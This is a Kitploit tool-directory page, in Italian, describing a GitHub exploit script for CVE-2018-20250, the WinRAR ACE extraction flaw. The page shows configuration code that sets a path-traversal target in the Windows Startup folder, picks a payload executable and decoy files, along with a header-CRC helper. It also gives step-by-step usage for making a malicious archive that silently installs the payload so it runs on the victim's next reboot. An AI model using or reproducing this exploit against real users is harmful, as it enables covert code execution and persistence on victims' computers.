Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2018-20250 — Script di exploit automatizzato per CVE-2018-20250 (esecuzione di codice tramite estrazione ACE di WinRAR) che genera un file di archivio dannoso incorporando un payload nella cartella di avvio di Windows. | Kitploit
Strumenti/GitHubGitHub/tzwlhack/cve-2018-20250
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingRed Teaming
GitHubtzwlhack/cve-2018-20250

CVE-2018-20250

Script di exploit automatizzato per CVE-2018-20250 (esecuzione di codice tramite estrazione ACE di WinRAR) che genera un file di archivio dannoso incorporando un payload nella cartella di avvio di Windows.

Vedi Repository
4 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

exploit per Estrarre l'esecuzione di codice da Winrar

poc di Ridter

Come si usa?

Ti basta installare Python 3.7, preparare un file malevolo da eseguire, impostare i valori che desideri, questo script exploit genererà automaticamente il file archivio malevolo!

  1. Imposta i valori che desideri
root@kitploit:~
... ...

# The archive filename you want
rar_filename = "test.rar"
# The evil file you want to run
evil_filename = "calc.exe"
# The decompression path you want, such shown below
target_filename = r"C:\C:C:../AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hi.exe"
# Other files to be displayed when the victim opens the winrar
# filename_list=[]
filename_list = ["hello.txt", "world.txt"]

... ...

def get_right_hdr_crc(filename):
    # This command may be different, it depends on the your Python3 environment.
    p = os.popen('py -3 acefile.py --headers %s'%(filename))
    res = p.read()
    pattern = re.compile('right_hdr_crc : 0x(.*?) | struct')
    result = pattern.findall(res)
    right_hdr_crc = result[0].upper()
    return hex2raw4(right_hdr_crc)

... ...

  1. Esegui l'exploit: l'exploit genererà automaticamente il file test.rar

  1. Se la vittima apre il file test.rar, vedrà i file hello.txt e world.txt; puoi anche aggiungere altri file, file più attraenti.

  1. Quando estrae il file, la directory di avvio dell'utente della vittima avrà un file in più chiamato hi.exe, che in realtà è un calc.exe. Quando riavvia il computer, il hi.exe verrà eseguito.

Divertiti! :)

Scarica lo strumento